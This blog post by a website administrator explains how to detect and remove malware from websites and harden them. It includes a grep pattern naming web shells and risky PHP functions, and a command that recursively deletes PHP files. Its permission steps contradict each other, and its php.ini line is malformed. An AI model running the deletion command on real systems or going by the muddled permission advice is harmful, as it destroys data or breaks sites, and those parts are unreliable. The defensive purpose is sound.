Blog

How to scan a website for viruses: tips from a professional admin

How to scan a website for viruses: tips from a professional admin
Vadim Korchinskii
Website admin since 2012

I have been administrating websites since 2012. I specialize in security: I delete malicious scripts and eliminate vulnerabilities. I have looked for viruses and deleted them both in small blogs and in large Internet portals. Today I am going to share the tools I use to scan a website for viruses and delete them.

This article is not for beginners: you’ll need basic knowledge of HTML, PHP, JS, and the ability to work in console.

What is a virus? How does it infect a website?

A virus is a malicious piece of code. It changes the appearance of a website, posts ads, redirects visitors to another website, gives hackers access to a website, uses resources of hosting for mining and other calculations.

A website is infected if:

  1. Pages got filled with content the owner has never added.
  2. A website slowed down.
  3. Visitors are redirected to another resource when they try to reach it.
  4. Search traffic dropped.
  5. New folders appeared on hosting.

Viruses get to websites through vulnerable code and extensions due to incorrect hosting settings, a password attack, hosting or computer infection.

When viruses get to a website, the owner’s reputations, search traffic, and the website revenue are in danger. In order to cure a website, you need to make sure it is actually infected and then find and delete malicious code. Once that is done, protect your website from future attacks. I’ll tell you about each stage of this process below.

Check whether your website is infected

If you are suspicious of viruses being present on your website but you are not quite confident, you need to make sure of the infection. I check websites using online scanners and also several browsers and search engines.

Website virus check through online scanners

Online scanners allow us to find malicious code quickly but I never rely solely on them: not every virus can be found automatically. Here are a few services:

Sometimes, Dr.Web doesn’t find malicious scripts; it’s more of a computer scanner rather than a website virus scanner.

Behavior in different browsers and on different devices

One of the signs of infection is redirection. When users try to access your website, they see a different resource. An infected website may open normally on a desktop while mobile users are redirected to a phishing page or a mobile subscription page. Or vice versa.

That’s why you need to check the behavior of your website in different browsers, operating systems, and mobile devices.

Search view

Search engines automatically scan websites for viruses. Infected resources are greyed out and have a warning caption.

In order to check your website, enter the address in the Google search bar. If you see a warning, it means the website is infected. Look at the results and possible infection chains.

This method is not universal! Search systems don’t find malicious code immediately. Moreover, a virus can be taught to check the source of the request and hide from search engines. If such a virus sees a search engine request, scripts won’t work — the search engine won’t see what the catch is.

The number of pages in search results

Another type of virus is doorways. They fill a website with their content.

In order to check a website for doorways, use search again. Enter the site:mysite.com request and look through all the search results. If you find pages that don’t match your website subject, these are doorways.

Find and delete malicious code

When there is no doubt about the infection, malicious code has to be found and deleted. The main problem is to find it. I look through files manually and also use the console.

Analyze HTML and JS scripts

Malicious scripts are often added to the website’s source code (press Ctrl+U in browser). Check it for extraneous JS scripts, iframe inserts, and spam links. Delete them if you find any.

Check all the JS scripts that are connecting during the page loading for extraneous inserts. Usually, they are either at the beginning or at the end of a JS script. Delete all extraneous inserts.

Sometimes, it’s hard to figure the code out or it may be obfuscated. In that case, compare script contents with the original file from the management system, plugin or template archive.

Indeed, a malicious script is not always a separately connected file, oftentimes, one of the existing files is modified. If the code is obfuscated, you won’t be able to understand it. In that case, you should find out in what file it is located.

 

If it is a part of a CMS, you need to check the original contents of such a file by extracting the archive with the CMS of the same version and comparing this file’s contents.

 

If a file is self-written, i.e. it doesn’t belong to a CMS component, you’d better contact developers. They probably know what they wrote themselves and what might have been added by malware. In that case, the original content can be restored from a backup.

Rostislav Vorobyev, Tech Support ISPsystem

Check the file and folder modification date

If you know when a website was hacked, malicious code can be found by checking all the files that have been modified since then.

For instance, a website was hacked a few days ago, then, in order to see all the PHP scripts that were modified in the last 7 days, you need to use this command: find . –name ‘*.ph*’ –mtime -7

After you run the command, you need to analyze PHP scripts found for possible malicious inserts.

This actually helps to shrink the list of the suspected PHP files that may contain malware. However, malware is not always located in PHP files. By slightly modifying an .htcaccess file, you can create a .jpg file, put PHP code inside it, and the web server will execute it like a normal PHP but it will look like a picture — implementation example.

Rostislav Vorobyev

Analyze directories upload/backup/log/image/tmp

Directories upload/backup/log/image/tmp are potentially dangerous because they are usually open for writing. In most cases, that’s where hackers put shell scripts that are used to infect website files and a database. Such directories should be checked for possible malicious PHP scripts.

For example, an upload catalog can be checked with this command: find /upload/ -type f -name '*.ph*'

It will show all the PHP files in the upload catalog.

After the analysis is completed, infected files can be deleted either manually or with this command: find /upload/ -name "*.php" -exec rm '{}' \;

Find files and folders with unconventional names

Open the website catalog. Find files and folders with unconventional names and suspicious content and delete them.

It’s important to understand what unconventional means. If you are sure that a directory or a file was not created by you and the name doesn’t look like one that could be made by a CMS or a plugin, you can delete it. But you’d better make a backup of these files, delete them and check whether your website keeps functioning normally. You should also check backups a couple of days prior to the infection. If it is malware, your backup won’t contain these files/directories.

Rostislav Vorobyev

Find many PHP or HTML files in one directory

All hosting folders need to be checked for multiple php and html files in one directory, you can do it with this command:

find ./ -mindepth 2 -type f -name '*.php' | cut -d/ -f2 | sort | uniq -c | sort –nr

After you run the command, the catalog list and the number of PHP files in each of them will appear on the screen. If a catalog contains a suspiciously large number of files, check them.

Find virus scripts by their content

You can quickly check a website for virus scripts with this command:

find ./ -type f -name "*.php" -exec grep -i -H "wso shell\|Backdoor\|Shell\|base64_decode\|str_rot13\|gzuncompress\|gzinflate\|strrev\|killall\|navigator.userAgent.match\|mysql_safe\|UdpFlood\|40,101,115,110,98,114,105,110\|msg=@gzinflate\|sql2_safe\|NlOThmMjgyODM0NjkyODdiYT\|6POkiojiO7iY3ns1rn8\|var vst = String.fromCharCode\|c999sh\|request12.php\|auth_pass\|shell_exec\|FilesMan\|passthru\|system\|passwd\|mkdir\|chmod\|mkdir\|md5=\|e2aa4e\|file_get_contents\|eval\|stripslashes\|fsockopen\|pfsockopen\|base64_files" {} \;

Alternatively, you can use grep without find.

grep -R -i -H -E "wso shell|Backdoor|Shell|base64_decode|str_rot13|gzuncompress|gzinflate|strrev|killall|navigator.userAgent.match|mysql_safe|UdpFlood|40,101,115,110,98,114,105,110|msg=@gzinflate|sql2_safe|NlOThmMjgyODM0NjkyODdiYT|6POkiojiO7iY3ns1rn8|var vst = String.fromCharCode|c999sh|request12.php|auth_pass|shell_exec|FilesMan|passthru|system|passwd|mkdir|chmod|md5=|e2aa4e|file_get_contents|eval|stripslashes|fsockopen|pfsockopen|base64_files" ./

These commands will search for malicious code in files of the current catalog. They look for files recursively, from the catalog they were run in.

There will be many matches, most of the files won’t be malware because CMS modules also use these functions.

Anyway, analyze the found PHP scripts for possible malicious inserts. Before you delete a file, make sure to check its content.

Check the database

Oftentimes, while hacking or infecting a website, hackers add malicious code to the database. In order to quickly check the database for viruses, you need to go to phpmyadmin and enter the following request through the search:

<script , <? , <?php , <iframe

If you stumble upon a malicious fragment, delete it.

Yes, that’s right. But it will be difficult for a regular user to analyze the content of a database — he/she will require basic SQL skills, syntax knowledge, and also understanding in what table one should look for the content. Besides, malware may be implicit, obfuscated, encrypted, etc.

Rostislav Vorobyev

Use online services

In order to automatically check a website for viruses, shell scripts, redirects, and doorways, you can use scanners:

Usually, automatic scanners detect up to 90% of all the malicious scripts on an infected website, you need to look for others manually by using internal check commands described above.

An antivirus can find most of the malicious files but it doesn’t know them all. New scripts appear, they are obfuscated differently in order to get around antivirus software, etc.

Rostislav Vorobyev

Protect a website from being hacked

After you delete all shell scripts and malicious inserts, you have to protect your website from being hacked. It will become invincible to external attacks.

The website admin panel protection by IP

Hackers get to a website by cracking its admin panel. In order to prevent it, set the restriction on entering the panel by IP. In other words, allow entering the admin panel only from a certain device.

To the admin panel catalog (administrator, bitrix/admin, wp-admin...)add an .htcaccess file with this content:

Order Deny, Allow Deny from all Allow from 1.1.1.1

Where 1.1.1.1 is the IP address that is allowed to enter the panel./p>

If your IP address isn’t static, you can also add an IP zone. For instance, your Internet company provides IP addresses like 192.168.100.34. Then add allow from 192.168. to the .htcaccess file.

The admin panel protection by HTTP authorization

Set additional login and password to the website admin panel. In order to do this, add .htcaccess and .htcpasswd files to the admin panel catalog (administrator, bitrix/admin, wp-admin...).

Add this code to the .htcaccess file:

ErrorDocument 401 "Unauthorized Access" ErrorDocument 403 "Forbidden" AuthName "Authorized Only" AuthType Basic AuthUserFile /home/ site.com /admin/.htpasswd require valid-user <Files ~ ".(css)$"> Allow from all satisfy any </Files> <Files ~ ".(js)$"> Allow from all satisfy any </Files> <Files ~ ".(png)$"> Allow from all satisfy any </Files> <Files ~ ".(gif)$"> Allow from all satisfy any </Files> <Files ~ ".(jpg)$"> Allow from all satisfy any </Files>

Where home/site.com/admin/.htpasswd is the full path to the .htcpasswd file of your server.

To the .htcpasswd file, you need to add additional login and password that will be used to enter the panel.

You can generate them at the Htpasswd Generator website. Enter new login and password and click Create .htpasswd file. Copy the result in the .htcpasswd file.

Website catalogs protection

All the files and catalogs on a website are available for writing by default. It is dangerous because a hacker will be able to upload and run a shell script or rewrite a file in any directory if he/she finds a vulnerability.

In order to secure a website, you need to «harden» it. To do this, you need to set permissions 444 for all CMS system files, plugins, and templates, that don’t require write permission for smooth operation. Set permissions 555 for catalogs.

I would set 755 or 655 for CMS system files, plugins, and templates. And 644 for catalogs. The best decision would be to refer to documentation of a particular CMS or a plugin to find out recommended permission for it to work properly. Incorrect permission may break a website.

Rostislav Vorobyev

The point is to prohibit writing to all the website catalog and prohibit modifying any CMS files that don’t require modifying while the website is running. Reading and running a file with such permissions won’t be available. So that your website could run properly, you need to do this:

  1. Set permissions 444 for all files.
  2. Set permissions 555 for all files.
  3. Set permissions 644 for files that need to be available for writing.
  4. Set permissions 755 for catalogs that need to be available for writing.

These permissions are good both for websites where the CMS, plugins and templates are greatly modified and there is no opportunity to update all of them to the latest versions, and for simple websites where the CMS, templates and plugins update rarely.

Anyway, if you need to update a plugin or a template, you can recursively change permissions to 644 and 755, update everything and set permissions 444 and 555 back again.

For the convenience of regular users, two PHP scripts are created:
mysite.com/protect.php — changes all permissions for files and folders to 444 and 555,
mysite.com/unprotected.php — sets permissions 644 and 755.

You also need to add the disable_functions =chmod.directory to the php.ini file so that permissions for files and folders couldn’t be changed programmatically.

For catalogs (backup/log/image...) that don’t allow setting permissions 555 and don’t have scripts, you need to add an .htcaccess file with this content:

RemoveHandler .phtml .php .php3 .php4 .php5 .php6 .phps .cgi .exe .pl .asp .aspx .shtml .shtm .fcgi .fpl .jsp .htm .html .wml AddType application/x-httpd-php-source .phtml .php .php3 .php4 .php5 .php6 .phps .cgi .exe .pl .asp .aspx .shtml .shtm .fcgi .fpl .jsp .htm .html .wml

This code blocks running of potentially dangerous scripts. It will prohibit PHP code to be run from a directory that shouldn’t contain executable files.

Protected your website? Subscribe to our blog!

If you found this article helpful, subscribe to the Vepp blog. Every two weeks we send editorial materials and articles from experts: on the best WordPress setup, website analytics, and other useful stuff.

Read this:
How to backup a website
SSL certificate for a website: what, why and where
Online store WordPress themes. 5 of the best and the free ones

Subscribe

 

Vadim Korchinskii
Website admin since 2012